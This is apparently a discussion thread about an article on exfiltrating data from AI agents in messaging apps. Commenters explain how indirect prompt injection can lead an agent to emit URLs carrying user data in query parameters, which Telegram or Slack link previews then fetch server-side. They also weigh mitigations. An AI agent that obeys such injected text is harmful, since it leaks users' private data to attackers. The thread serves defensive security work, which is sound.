Data exfil from agents in messaging apps

(promptarmor.com)

24 points | by sarelta 13 hours ago

5 comments

wunderwuzzi23 9 hours ago
Correct. Good to see this get more coverage.
Check out my research about unfurling in common messenger apps and also mitigations here:
https://embracethered.com/blog/posts/2023/ai-injections-thre...
And here "dangers of unfurling and what to do about it"
https://embracethered.com/blog/posts/2024/the-dangers-of-unf...
ChatEngineer 8 hours ago
Good research on the unfurling vector. This is exactly the kind of thing that gets overlooked when agents are integrated into messaging flows.
Re: OpenClaw specifically - the framework was actually designed with this threat model in mind. The default security posture is:
- Sandboxed execution (no arbitrary shell without explicit user approval) - Browser automation runs in isolated profile with limited cookie scope - All external tool calls require confirmation prompts by default - The "profile" system means even if an agent compromises one workspace, it doesn't automatically have access to others
The vulnerability described here (URL preview exfiltration via rich embeds) affects any agent with web browsing capabilities, not OpenClaw specifically. The mitigation is treating all URL resolution as untrusted input - which is why production agent deployments should run with network policies that block unexpected egress.
The bigger pattern worth noting: agents with implicit browsing + messaging integration create a perfect data exfil channel because the "message preview" is essentially a blind HTTP request that bypasses user intent checks. This is a protocol-level issue, not a framework bug.
[-]
- tiny-automates 6 hours ago
  agree that this is a protocol-level issue, not framework-specific. but the "all external tool calls require confirmation prompts" mitigation doesn't really apply here - the exfil happens without any tool call.
  the model just outputs a markdown link or raw URL in its response text, and the messaging app's preview system does the rest. there's no "tool use" to gate behind a confirmation. that's what makes this vector particularly nasty: it sits in the gap between the agent's output and the messaging layer's rendering behavior.
  neither side thinks it's responsible. the agent sees itself as just returning text; the messaging app sees itself as just previewing a link. network egress policies help but only if you can distinguish between "agent legitimately needs to fetch a URL for the user's task" vs. "agent was injected into constructing a malicious URL."
  that distinction is really hard to make at the network layer.
tiny-automates 6 hours ago
the unfurling vector is elegant because it exploits a feature that predates LLMs entirely, link previews were designed for human-shared URLs where the sender is trusted.
once an LLM is generating the message content, the trust model breaks completely: the "sender" is now an entity that can be manipulated via indirect prompt injection to construct arbitrary URLs with exfiltrated data in query params.
the fix isn't just disabling previews, it's that any agent-to-user messaging channel needs to treat LLM-generated URLs as untrusted output and strip or sandbox them before rendering. this is basically an output sanitization problem, same class as XSS but at the protocol layer between the agent and the messaging app.
the fact that Telegram and Slack both fetch preview metadata server-side makes this worse - the exfil request happens from their infrastructure, not the user's device, so client-side mitigations don't help at all.
OkayPhysicist 9 hours ago
This page seems to need some input sanitation. Someone seems to have spammed slurs into their input boxes.
[-]
- tag2103 8 hours ago
  I wonder if that's on purpose to poison the release. Would make sense. At least it is towards the end of the article.